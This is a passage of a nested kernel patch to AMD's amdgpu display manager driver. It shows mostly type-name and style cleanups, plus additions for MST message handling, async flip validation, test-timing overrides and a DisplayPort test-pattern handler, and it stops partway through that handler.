+ static int get_brightness_range(const struct amdgpu_dm_backlight_caps *caps,
+-				unsigned *min, unsigned *max)
++				unsigned int *min, unsigned int *max)
+ {
+ 	if (!caps)
+ 		return 0;
+@@ -4005,7 +4013,7 @@ static int get_brightness_range(const struct amdgpu_dm_backlight_caps *caps,
+ static u32 convert_brightness_from_user(const struct amdgpu_dm_backlight_caps *caps,
+ 					uint32_t brightness)
+ {
+-	unsigned min, max;
++	unsigned int min, max;
+ 
+ 	if (!get_brightness_range(caps, &min, &max))
+ 		return brightness;
+@@ -4018,7 +4026,7 @@ static u32 convert_brightness_from_user(const struct amdgpu_dm_backlight_caps *c
+ static u32 convert_brightness_to_user(const struct amdgpu_dm_backlight_caps *caps,
+ 				      uint32_t brightness)
+ {
+-	unsigned min, max;
++	unsigned int min, max;
+ 
+ 	if (!get_brightness_range(caps, &min, &max))
+ 		return brightness;
+@@ -4236,12 +4244,12 @@ static void amdgpu_set_panel_orientation(struct drm_connector *connector);
+ static int amdgpu_dm_initialize_drm_device(struct amdgpu_device *adev)
+ {
+ 	struct amdgpu_display_manager *dm = &adev->dm;
+-	int32_t i;
++	s32 i;
+ 	struct amdgpu_dm_connector *aconnector = NULL;
+ 	struct amdgpu_encoder *aencoder = NULL;
+ 	struct amdgpu_mode_info *mode_info = &adev->mode_info;
+-	uint32_t link_cnt;
+-	int32_t primary_planes;
++	u32 link_cnt;
++	s32 primary_planes;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
+ 	const struct dc_plane_cap *plane;
+ 	bool psr_feature_enabled = false;
+@@ -4499,7 +4507,6 @@ fail:
+ static void amdgpu_dm_destroy_drm_device(struct amdgpu_display_manager *dm)
+ {
+ 	drm_atomic_private_obj_fini(&dm->atomic_obj);
+-	return;
+ }
+ 
+ /******************************************************************************
+@@ -4768,7 +4775,7 @@ fill_plane_color_attributes(const struct drm_plane_state *plane_state,
+ static int
+ fill_dc_plane_info_and_addr(struct amdgpu_device *adev,
+ 			    const struct drm_plane_state *plane_state,
+-			    const uint64_t tiling_flags,
++			    const u64 tiling_flags,
+ 			    struct dc_plane_info *plane_info,
+ 			    struct dc_plane_address *address,
+ 			    bool tmz_surface,
+@@ -4977,7 +4984,7 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	uint32_t num_clips;
+ 	bool bb_changed;
+ 	bool fb_changed;
+-	uint32_t i = 0;
++	u32 i = 0;
+ 
+ 	flip_addrs->dirty_rect_count = 0;
+ 
+@@ -5111,7 +5118,7 @@ static enum dc_color_depth
+ convert_color_depth_from_display_info(const struct drm_connector *connector,
+ 				      bool is_y420, int requested_bpc)
+ {
+-	uint8_t bpc;
++	u8 bpc;
+ 
+ 	if (is_y420) {
+ 		bpc = 8;
+@@ -5225,6 +5232,7 @@ static bool adjust_colour_depth_from_display_info(
+ {
+ 	enum dc_color_depth depth = timing_out->display_color_depth;
+ 	int normalized_clk;
++
+ 	do {
+ 		normalized_clk = timing_out->pix_clk_100hz / 10;
+ 		/* YCbCr 4:2:0 requires additional adjustment of 1/2 */
+@@ -5440,6 +5448,7 @@ create_fake_sink(struct amdgpu_dm_connector *aconnector)
+ {
+ 	struct dc_sink_init_data sink_init_data = { 0 };
+ 	struct dc_sink *sink = NULL;
++
+ 	sink_init_data.link = aconnector->dc_link;
+ 	sink_init_data.sink_signal = aconnector->dc_link->connector_signal;
+ 
+@@ -5563,7 +5572,7 @@ get_highest_refresh_rate_mode(struct amdgpu_dm_connector *aconnector,
+ 		return &aconnector->freesync_vid_base;
+ 
+ 	/* Find the preferred mode */
+-	list_for_each_entry (m, list_head, head) {
++	list_for_each_entry(m, list_head, head) {
+ 		if (m->type & DRM_MODE_TYPE_PREFERRED) {
+ 			m_pref = m;
+ 			break;
+@@ -5587,7 +5596,7 @@ get_highest_refresh_rate_mode(struct amdgpu_dm_connector *aconnector,
+ 	 * For some monitors, preferred mode is not the mode with highest
+ 	 * supported refresh rate.
+ 	 */
+-	list_for_each_entry (m, list_head, head) {
++	list_for_each_entry(m, list_head, head) {
+ 		current_refresh  = drm_mode_vrefresh(m);
+ 
+ 		if (m->hdisplay == m_pref->hdisplay &&
+@@ -5655,8 +5664,8 @@ static void apply_dsc_policy_for_edp(struct amdgpu_dm_connector *aconnector,
+ 				    uint32_t max_dsc_target_bpp_limit_override)
+ {
+ 	const struct dc_link_settings *verified_link_cap = NULL;
+-	uint32_t link_bw_in_kbps;
+-	uint32_t edp_min_bpp_x16, edp_max_bpp_x16;
++	u32 link_bw_in_kbps;
++	u32 edp_min_bpp_x16, edp_max_bpp_x16;
+ 	struct dc *dc = sink->ctx->dc;
+ 	struct dc_dsc_bw_range bw_range = {0};
+ 	struct dc_dsc_config dsc_cfg = {0};
+@@ -5713,17 +5722,15 @@ static void apply_dsc_policy_for_stream(struct amdgpu_dm_connector *aconnector,
+ 					struct dsc_dec_dpcd_caps *dsc_caps)
+ {
+ 	struct drm_connector *drm_connector = &aconnector->base;
+-	uint32_t link_bandwidth_kbps;
+-	uint32_t max_dsc_target_bpp_limit_override = 0;
++	u32 link_bandwidth_kbps;
+ 	struct dc *dc = sink->ctx->dc;
+-	uint32_t max_supported_bw_in_kbps, timing_bw_in_kbps;
+-	uint32_t dsc_max_supported_bw_in_kbps;
++	u32 max_supported_bw_in_kbps, timing_bw_in_kbps;
++	u32 dsc_max_supported_bw_in_kbps;
++	u32 max_dsc_target_bpp_limit_override =
++		drm_connector->display_info.max_dsc_bpp;
+ 
+ 	link_bandwidth_kbps = dc_link_bandwidth_kbps(aconnector->dc_link,
+ 							dc_link_get_link_cap(aconnector->dc_link));
+-	if (stream->link && stream->link->local_sink)
+-		max_dsc_target_bpp_limit_override =
+-			stream->link->local_sink->edid_caps.panel_patch.max_dsc_target_bpp_limit;
+ 
+ 	/* Set DSC policy according to dsc_clock_en */
+ 	dc_dsc_policy_set_enable_dsc_when_not_needed(
+@@ -5860,7 +5867,7 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		 * This may not be an error, the use case is when we have no
+ 		 * usermode calls to reset and set mode upon hotplug. In this
+ 		 * case, we call set mode ourselves to restore the previous mode
+-		 * and the modelist may not be filled in in time.
++		 * and the modelist may not be filled in time.
+ 		 */
+ 		DRM_DEBUG_DRIVER("No preferred mode found\n");
+ 	} else {
+@@ -5884,9 +5891,9 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		drm_mode_set_crtcinfo(&mode, 0);
+ 
+ 	/*
+-	* If scaling is enabled and refresh rate didn't change
+-	* we copy the vic and polarities of the old timings
+-	*/
++	 * If scaling is enabled and refresh rate didn't change
++	 * we copy the vic and polarities of the old timings
++	 */
+ 	if (!scale || mode_refresh != preferred_refresh)
+ 		fill_stream_properties_from_drm_display_mode(
+ 			stream, &mode, &aconnector->base, con_state, NULL,
+@@ -5896,6 +5903,14 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 			stream, &mode, &aconnector->base, con_state, old_stream,
+ 			requested_bpc);
+ 
++	if (aconnector->timing_changed) {
++		DC_LOG_DEBUG("%s: overriding timing for automated test, bpc %d, changing to %d\n",
++				__func__,
++				stream->timing.display_color_depth,
++				aconnector->timing_requested->display_color_depth);
++		stream->timing = *aconnector->timing_requested;
++	}
++
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
+ 	/* SST DSC determination policy */
+ 	update_dsc_caps(aconnector, sink, stream, &dsc_caps);
+@@ -6540,6 +6555,7 @@ static int dm_encoder_helper_atomic_check(struct drm_encoder *encoder,
+ 
+ 	if (!state->duplicated) {
+ 		int max_bpc = conn_state->max_requested_bpc;
++
+ 		is_y420 = drm_mode_is_420_also(&connector->display_info, adjusted_mode) &&
+ 			  aconnector->force_yuv420_output;
+ 		color_depth = convert_color_depth_from_display_info(connector,
+@@ -6860,7 +6876,7 @@ static bool is_duplicate_mode(struct amdgpu_dm_connector *aconnector,
+ {
+ 	struct drm_display_mode *m;
+ 
+-	list_for_each_entry (m, &aconnector->base.probed_modes, head) {
++	list_for_each_entry(m, &aconnector->base.probed_modes, head) {
+ 		if (drm_mode_equal(m, mode))
+ 			return true;
+ 	}
+@@ -6873,7 +6889,7 @@ static uint add_fs_modes(struct amdgpu_dm_connector *aconnector)
+ 	const struct drm_display_mode *m;
+ 	struct drm_display_mode *new_mode;
+ 	uint i;
+-	uint32_t new_modes_count = 0;
++	u32 new_modes_count = 0;
+ 
+ 	/* Standard FPS values
+ 	 *
+@@ -6887,7 +6903,7 @@ static uint add_fs_modes(struct amdgpu_dm_connector *aconnector)
+ 	 * 60 	        - Commonly used
+ 	 * 48,72,96,120 - Multiples of 24
+ 	 */
+-	static const uint32_t common_rates[] = {
++	static const u32 common_rates[] = {
+ 		23976, 24000, 25000, 29970, 30000,
+ 		48000, 50000, 60000, 72000, 96000, 120000
+ 	};
+@@ -6903,8 +6919,8 @@ static uint add_fs_modes(struct amdgpu_dm_connector *aconnector)
+ 		return 0;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(common_rates); i++) {
+-		uint64_t target_vtotal, target_vtotal_diff;
+-		uint64_t num, den;
++		u64 target_vtotal, target_vtotal_diff;
++		u64 num, den;
+ 
+ 		if (drm_mode_vrefresh(m) * 1000 < common_rates[i])
+ 			continue;
+@@ -6972,13 +6988,7 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		/* most eDP supports only timings from its edid,
+-		 * usually only detailed timings are available
+-		 * from eDP edid. timings which are not from edid
+-		 * may damage eDP
+-		 */
+-		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
+-			amdgpu_dm_connector_add_common_modes(encoder, connector);
++		amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+@@ -7010,6 +7020,7 @@ void amdgpu_dm_connector_init_helper(struct amdgpu_display_manager *dm,
+ 	aconnector->hpd.hpd = AMDGPU_HPD_NONE; /* not used */
+ 	aconnector->audio_inst = -1;
+ 	mutex_init(&aconnector->hpd_lock);
++	mutex_init(&aconnector->handle_mst_msg_ready);
+ 
+ 	/*
+ 	 * configure support HPD hot plug connector_>polled default value is 0
+@@ -7152,7 +7163,7 @@ create_i2c(struct ddc_service *ddc_service,
+  */
+ static int amdgpu_dm_connector_init(struct amdgpu_display_manager *dm,
+ 				    struct amdgpu_dm_connector *aconnector,
+-				    uint32_t link_index,
++				    u32 link_index,
+ 				    struct amdgpu_encoder *aencoder)
+ {
+ 	int res = 0;
+@@ -7163,7 +7174,6 @@ static int amdgpu_dm_connector_init(struct amdgpu_display_manager *dm,
+ 
+ 	link->priv = aconnector;
+ 
+-	DRM_DEBUG_DRIVER("%s()\n", __func__);
+ 
+ 	i2c = create_i2c(link->ddc, link->link_index, &res);
+ 	if (!i2c) {
+@@ -7643,8 +7653,8 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				    struct drm_crtc *pcrtc,
+ 				    bool wait_for_vblank)
+ {
+-	uint32_t i;
+-	uint64_t timestamp_ns;
++	u32 i;
++	u64 timestamp_ns;
+ 	struct drm_plane *plane;
+ 	struct drm_plane_state *old_plane_state, *new_plane_state;
+ 	struct amdgpu_crtc *acrtc_attach = to_amdgpu_crtc(pcrtc);
+@@ -7655,7 +7665,7 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			to_dm_crtc_state(drm_atomic_get_old_crtc_state(state, pcrtc));
+ 	int planes_count = 0, vpos, hpos;
+ 	unsigned long flags;
+-	uint32_t target_vblank, last_flip_vblank;
++	u32 target_vblank, last_flip_vblank;
+ 	bool vrr_active = amdgpu_dm_vrr_active(acrtc_state);
+ 	bool cursor_update = false;
+ 	bool pflip_present = false;
+@@ -7757,7 +7767,15 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 		 * Only allow immediate flips for fast updates that don't
+ 		 * change memory domain, FB pitch, DCC state, rotation or
+ 		 * mirroring.
++		 *
++		 * dm_crtc_helper_atomic_check() only accepts async flips with
++		 * fast updates.
+ 		 */
++		if (crtc->state->async_flip &&
++		    acrtc_state->update_type != UPDATE_TYPE_FAST)
++			drm_warn_once(state->dev,
++				      "[PLANE:%d:%s] async flip with non-fast update\n",
++				      plane->base.id, plane->name);
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+ 			acrtc_state->update_type == UPDATE_TYPE_FAST &&
+@@ -7800,8 +7818,7 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			 * DRI3/Present extension with defined target_msc.
+ 			 */
+ 			last_flip_vblank = amdgpu_get_vblank_counter_kms(pcrtc);
+-		}
+-		else {
++		} else {
+ 			/* For variable refresh rate mode only:
+ 			 * Get vblank of last completed flip to avoid > 1 vrr
+ 			 * flips per video frame by use of throttling, but allow
+@@ -8096,7 +8113,7 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 	struct amdgpu_display_manager *dm = &adev->dm;
+ 	struct dm_atomic_state *dm_state;
+ 	struct dc_state *dc_state = NULL, *dc_state_temp = NULL;
+-	uint32_t i, j;
++	u32 i, j;
+ 	struct drm_crtc *crtc;
+ 	struct drm_crtc_state *old_crtc_state, *new_crtc_state;
+ 	unsigned long flags;
+@@ -8128,8 +8145,8 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 		dc_resource_state_copy_construct_current(dm->dc, dc_state);
+ 	}
+ 
+-	for_each_oldnew_crtc_in_state (state, crtc, old_crtc_state,
+-				       new_crtc_state, i) {
++	for_each_oldnew_crtc_in_state(state, crtc, old_crtc_state,
++				      new_crtc_state, i) {
+ 		struct amdgpu_crtc *acrtc = to_amdgpu_crtc(crtc);
+ 
+ 		dm_old_crtc_state = to_dm_crtc_state(old_crtc_state);
+@@ -8152,9 +8169,7 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 		dm_old_crtc_state = to_dm_crtc_state(old_crtc_state);
+ 
+ 		drm_dbg_state(state->dev,
+-			"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, "
+-			"planes_changed:%d, mode_changed:%d,active_changed:%d,"
+-			"connectors_changed:%d\n",
++			"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, planes_changed:%d, mode_changed:%d,active_changed:%d,connectors_changed:%d\n",
+ 			acrtc->crtc_id,
+ 			new_crtc_state->enable,
+ 			new_crtc_state->active,
+@@ -8639,8 +8654,8 @@ static int do_aquire_global_lock(struct drm_device *dev,
+ 					&commit->flip_done, 10*HZ);
+ 
+ 		if (ret == 0)
+-			DRM_ERROR("[CRTC:%d:%s] hw_done or flip_done "
+-				  "timed out\n", crtc->base.id, crtc->name);
++			DRM_ERROR("[CRTC:%d:%s] hw_done or flip_done timed out\n",
++				  crtc->base.id, crtc->name);
+ 
+ 		drm_crtc_commit_put(commit);
+ 	}
+@@ -8725,8 +8740,9 @@ is_timing_unchanged_for_freesync(struct drm_crtc_state *old_crtc_state,
+ 	return false;
+ }
+ 
+-static void set_freesync_fixed_config(struct dm_crtc_state *dm_new_crtc_state) {
+-	uint64_t num, den, res;
++static void set_freesync_fixed_config(struct dm_crtc_state *dm_new_crtc_state)
++{
++	u64 num, den, res;
+ 	struct drm_crtc_state *new_crtc_state = &dm_new_crtc_state->base;
+ 
+ 	dm_new_crtc_state->freesync_config.state = VRR_STATE_ACTIVE_FIXED;
+@@ -8848,9 +8864,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		goto skip_modeset;
+ 
+ 	drm_dbg_state(state->dev,
+-		"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, "
+-		"planes_changed:%d, mode_changed:%d,active_changed:%d,"
+-		"connectors_changed:%d\n",
++		"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, planes_changed:%d, mode_changed:%d,active_changed:%d,connectors_changed:%d\n",
+ 		acrtc->crtc_id,
+ 		new_crtc_state->enable,
+ 		new_crtc_state->active,
+@@ -8879,8 +8893,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 						     old_crtc_state)) {
+ 			new_crtc_state->mode_changed = false;
+ 			DRM_DEBUG_DRIVER(
+-				"Mode change not required for front porch change, "
+-				"setting mode_changed to %d",
++				"Mode change not required for front porch change, setting mode_changed to %d",
+ 				new_crtc_state->mode_changed);
+ 
+ 			set_freesync_fixed_config(dm_new_crtc_state);
+@@ -8892,9 +8905,8 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 			struct drm_display_mode *high_mode;
+ 
+ 			high_mode = get_highest_refresh_rate_mode(aconnector, false);
+-			if (!drm_mode_equal(&new_crtc_state->mode, high_mode)) {
++			if (!drm_mode_equal(&new_crtc_state->mode, high_mode))
+ 				set_freesync_fixed_config(dm_new_crtc_state);
+-			}
+ 		}
+ 
+ 		ret = dm_atomic_get_state(state, &dm_state);
+@@ -9062,6 +9074,7 @@ static bool should_reset_plane(struct drm_atomic_state *state,
+ 	 */
+ 	for_each_oldnew_plane_in_state(state, other, old_other_state, new_other_state, i) {
+ 		struct amdgpu_framebuffer *old_afb, *new_afb;
++
+ 		if (other->type == DRM_PLANE_TYPE_CURSOR)
+ 			continue;
+ 
+@@ -9160,11 +9173,12 @@ static int dm_check_cursor_fb(struct amdgpu_crtc *new_acrtc,
+ 	}
+ 
+ 	/* Core DRM takes care of checking FB modifiers, so we only need to
+-	 * check tiling flags when the FB doesn't have a modifier. */
++	 * check tiling flags when the FB doesn't have a modifier.
++	 */
+ 	if (!(fb->flags & DRM_MODE_FB_MODIFIERS)) {
+ 		if (adev->family < AMDGPU_FAMILY_AI) {
+ 			linear = AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) != DC_ARRAY_2D_TILED_THIN1 &&
+-			         AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) != DC_ARRAY_1D_TILED_THIN1 &&
++				 AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) != DC_ARRAY_1D_TILED_THIN1 &&
+ 				 AMDGPU_TILING_GET(afb->tiling_flags, MICRO_TILE_MODE) == 0;
+ 		} else {
+ 			linear = AMDGPU_TILING_GET(afb->tiling_flags, SWIZZLE_MODE) == 0;
+@@ -9377,12 +9391,12 @@ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 	/* On DCE and DCN there is no dedicated hardware cursor plane. We get a
+ 	 * cursor per pipe but it's going to inherit the scaling and
+ 	 * positioning from the underlying pipe. Check the cursor plane's
+-	 * blending properties match the underlying planes'. */
++	 * blending properties match the underlying planes'.
++	 */
+ 
+ 	new_cursor_state = drm_atomic_get_new_plane_state(state, cursor);
+-	if (!new_cursor_state || !new_cursor_state->fb) {
++	if (!new_cursor_state || !new_cursor_state->fb)
+ 		return 0;
+-	}
+ 
+ 	dm_get_oriented_plane_size(new_cursor_state, &cursor_src_w, &cursor_src_h);
+ 	cursor_scale_w = new_cursor_state->crtc_w * 1000 / cursor_src_w;
+@@ -9428,6 +9442,7 @@ static int add_affected_mst_dsc_crtcs(struct drm_atomic_state *state, struct drm
+ 	struct drm_connector_state *conn_state, *old_conn_state;
+ 	struct amdgpu_dm_connector *aconnector = NULL;
+ 	int i;
++
+ 	for_each_oldnew_connector_in_state(state, connector, old_conn_state, conn_state, i) {
+ 		if (!conn_state->crtc)
+ 			conn_state = old_conn_state;
+@@ -9870,7 +9885,7 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 	}
+ 
+ 	/* Store the overall update type for use later in atomic check. */
+-	for_each_new_crtc_in_state (state, crtc, new_crtc_state, i) {
++	for_each_new_crtc_in_state(state, crtc, new_crtc_state, i) {
+ 		struct dm_crtc_state *dm_new_crtc_state =
+ 			to_dm_crtc_state(new_crtc_state);
+ 
+@@ -9892,7 +9907,7 @@ fail:
+ 	else if (ret == -EINTR || ret == -EAGAIN || ret == -ERESTARTSYS)
+ 		DRM_DEBUG_DRIVER("Atomic check stopped due to signal.\n");
+ 	else
+-		DRM_DEBUG_DRIVER("Atomic check failed with err: %d \n", ret);
++		DRM_DEBUG_DRIVER("Atomic check failed with err: %d\n", ret);
+ 
+ 	trace_amdgpu_dm_atomic_check_finish(state, ret);
+ 
+@@ -9902,7 +9917,7 @@ fail:
+ static bool is_dp_capable_without_timing_msa(struct dc *dc,
+ 					     struct amdgpu_dm_connector *amdgpu_dm_connector)
+ {
+-	uint8_t dpcd_data;
++	u8 dpcd_data;
+ 	bool capable = false;
+ 
+ 	if (amdgpu_dm_connector->dc_link &&
+@@ -9921,7 +9936,7 @@ static bool is_dp_capable_without_timing_msa(struct dc *dc,
+ static bool dm_edid_parser_send_cea(struct amdgpu_display_manager *dm,
+ 		unsigned int offset,
+ 		unsigned int total_length,
+-		uint8_t *data,
++		u8 *data,
+ 		unsigned int length,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb)
+ {
+@@ -9976,7 +9991,7 @@ static bool dm_edid_parser_send_cea(struct amdgpu_display_manager *dm,
+ }
+ 
+ static bool parse_edid_cea_dmcu(struct amdgpu_display_manager *dm,
+-		uint8_t *edid_ext, int len,
++		u8 *edid_ext, int len,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+ 	int i;
+@@ -10017,7 +10032,7 @@ static bool parse_edid_cea_dmcu(struct amdgpu_display_manager *dm,
+ }
+ 
+ static bool parse_edid_cea_dmub(struct amdgpu_display_manager *dm,
+-		uint8_t *edid_ext, int len,
++		u8 *edid_ext, int len,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+ 	int i;
+@@ -10033,7 +10048,7 @@ static bool parse_edid_cea_dmub(struct amdgpu_display_manager *dm,
+ }
+ 
+ static bool parse_edid_cea(struct amdgpu_dm_connector *aconnector,
+-		uint8_t *edid_ext, int len,
++		u8 *edid_ext, int len,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+ 	struct amdgpu_device *adev = drm_to_adev(aconnector->base.dev);
+@@ -10047,7 +10062,7 @@ static bool parse_edid_cea(struct amdgpu_dm_connector *aconnector,
+ static int parse_hdmi_amd_vsdb(struct amdgpu_dm_connector *aconnector,
+ 		struct edid *edid, struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+-	uint8_t *edid_ext = NULL;
++	u8 *edid_ext = NULL;
+ 	int i;
+ 	bool valid_vsdb_found = false;
+ 
+@@ -10223,7 +10238,7 @@ void amdgpu_dm_trigger_timing_sync(struct drm_device *dev)
+ }
+ 
+ void dm_write_reg_func(const struct dc_context *ctx, uint32_t address,
+-		       uint32_t value, const char *func_name)
++		       u32 value, const char *func_name)
+ {
+ #ifdef DM_CHECK_ADDR_0
+ 	if (address == 0) {
+@@ -10238,7 +10253,7 @@ void dm_write_reg_func(const struct dc_context *ctx, uint32_t address,
+ uint32_t dm_read_reg_func(const struct dc_context *ctx, uint32_t address,
+ 			  const char *func_name)
+ {
+-	uint32_t value;
++	u32 value;
+ #ifdef DM_CHECK_ADDR_0
+ 	if (address == 0) {
+ 		DC_ERR("invalid register read; address = 0\n");
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+index ac26e917240b9..2c9a33c80c818 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+@@ -31,6 +31,7 @@
+ #include <drm/drm_connector.h>
+ #include <drm/drm_crtc.h>
+ #include <drm/drm_plane.h>
++#include "link_service_types.h"
+ 
+ /*
+  * This file contains the definition for amdgpu_display_manager
+@@ -192,6 +193,11 @@ struct hpd_rx_irq_offload_work_queue {
+ 	 * we're handling link loss
+ 	 */
+ 	bool is_handling_link_loss;
++	/**
++	 * @is_handling_mst_msg_rdy_event: Used to prevent inserting mst message
++	 * ready event when we're already handling mst message ready event
++	 */
++	bool is_handling_mst_msg_rdy_event;
+ 	/**
+ 	 * @aconnector: The aconnector that this work queue is attached to
+ 	 */
+@@ -613,6 +619,8 @@ struct amdgpu_dm_connector {
+ 	struct drm_dp_mst_port *port;
+ 	struct amdgpu_dm_connector *mst_port;
+ 	struct drm_dp_aux *dsc_aux;
++	struct mutex handle_mst_msg_ready;
++
+ 	/* TODO see if we can merge with ddc_bus or make a dm_connector */
+ 	struct amdgpu_i2c_adapter *i2c;
+ 
+@@ -650,6 +658,10 @@ struct amdgpu_dm_connector {
+ 
+ 	/* Record progress status of mst*/
+ 	uint8_t mst_status;
++
++	/* Automated testing */
++	bool timing_changed;
++	struct dc_crtc_timing *timing_requested;
+ };
+ 
+ static inline void amdgpu_dm_set_mst_status(uint8_t *status,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 1ec643a0d00d2..b9b70f4562c72 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -406,6 +406,18 @@ static int dm_crtc_helper_atomic_check(struct drm_crtc *crtc,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * Only allow async flips for fast updates that don't change the FB
++	 * pitch, the DCC state, rotation, etc.
++	 */
++	if (crtc_state->async_flip &&
++	    dm_crtc_state->update_type != UPDATE_TYPE_FAST) {
++		drm_dbg_atomic(crtc->dev,
++			       "[CRTC:%d:%s] async flips are only supported for fast updates\n",
++			       crtc->base.id, crtc->name);
++		return -EINVAL;
++	}
++
+ 	/* In some use cases, like reset, no stream is attached */
+ 	if (!dm_crtc_state->stream)
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index db7744beed5fd..9dc41f569a761 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -38,6 +38,9 @@
+ #include "amdgpu_dm.h"
+ #include "amdgpu_dm_irq.h"
+ #include "amdgpu_dm_mst_types.h"
++#include "dpcd_defs.h"
++#include "dc/inc/core_types.h"
++#include "dc_link_dp.h"
+ 
+ #include "dm_helpers.h"
+ #include "ddc_service_types.h"
+@@ -1056,6 +1059,128 @@ void dm_helpers_mst_enable_stream_features(const struct dc_stream_state *stream)
+ 					 sizeof(new_downspread));
+ }
+ 
++bool dm_helpers_dp_handle_test_pattern_request(
++		struct dc_context *ctx,
++		const struct dc_link *link,
++		union link_test_pattern dpcd_test_pattern,
++		union test_misc dpcd_test_params)
++{
++	enum dp_test_pattern test_pattern;
++	enum dp_test_pattern_color_space test_pattern_color_space =
++			DP_TEST_PATTERN_COLOR_SPACE_UNDEFINED;
++	enum dc_color_depth requestColorDepth = COLOR_DEPTH_UNDEFINED;
++	enum dc_pixel_encoding requestPixelEncoding = PIXEL_ENCODING_UNDEFINED;
++	struct pipe_ctx *pipes = link->dc->current_state->res_ctx.pipe_ctx;
++	struct pipe_ctx *pipe_ctx = NULL;
++	struct amdgpu_dm_connector *aconnector = link->priv;
++	int i;
++
++	for (i = 0; i < MAX_PIPES; i++) {
++		if (pipes[i].stream == NULL)
++			continue;
++
++		if (pipes[i].stream->link == link && !pipes[i].top_pipe &&
++			!pipes[i].prev_odm_pipe) {
++			pipe_ctx = &pipes[i];
++			break;
++		}
++	}
++
++	if (pipe_ctx == NULL)
++		return false;
++
++	switch (dpcd_test_pattern.bits.PATTERN) {
++	case LINK_TEST_PATTERN_COLOR_RAMP:
++		test_pattern = DP_TEST_PATTERN_COLOR_RAMP;
++	break;
++	case LINK_TEST_PATTERN_VERTICAL_BARS:
++		test_pattern = DP_TEST_PATTERN_VERTICAL_BARS;
++	break; /* black and white */
++	case LINK_TEST_PATTERN_COLOR_SQUARES:
++		test_pattern = (dpcd_test_params.bits.DYN_RANGE ==
++				TEST_DYN_RANGE_VESA ?
++				DP_TEST_PATTERN_COLOR_SQUARES :
++				DP_TEST_PATTERN_COLOR_SQUARES_CEA);
++	break;
++	default:
++		test_pattern = DP_TEST_PATTERN_VIDEO_MODE;
++	break;
++	}
++
++	if (dpcd_test_params.bits.CLR_FORMAT == 0)
++		test_pattern_color_space = DP_TEST_PATTERN_COLOR_SPACE_RGB;
++	else
++		test_pattern_color_space = dpcd_test_params.bits.YCBCR_COEFS ?
++				DP_TEST_PATTERN_COLOR_SPACE_YCBCR709 :
++				DP_TEST_PATTERN_COLOR_SPACE_YCBCR601;
++
++	switch (dpcd_test_params.bits.BPC) {
++	case 0: // 6 bits
++		requestColorDepth = COLOR_DEPTH_666;
++		break;
++	case 1: // 8 bits
++		requestColorDepth = COLOR_DEPTH_888;
++		break;
++	case 2: // 10 bits
++		requestColorDepth = COLOR_DEPTH_101010;
++		break;
++	case 3: // 12 bits
++		requestColorDepth = COLOR_DEPTH_121212;
++		break;
++	default:
++		break;
++	}
++
++	switch (dpcd_test_params.bits.CLR_FORMAT) {
++	case 0:
++		requestPixelEncoding = PIXEL_ENCODING_RGB;
++		break;
++	case 1:
++		requestPixelEncoding = PIXEL_ENCODING_YCBCR422;
++		break;
++	case 2:
++		requestPixelEncoding = PIXEL_ENCODING_YCBCR444;
++		break;
++	default:
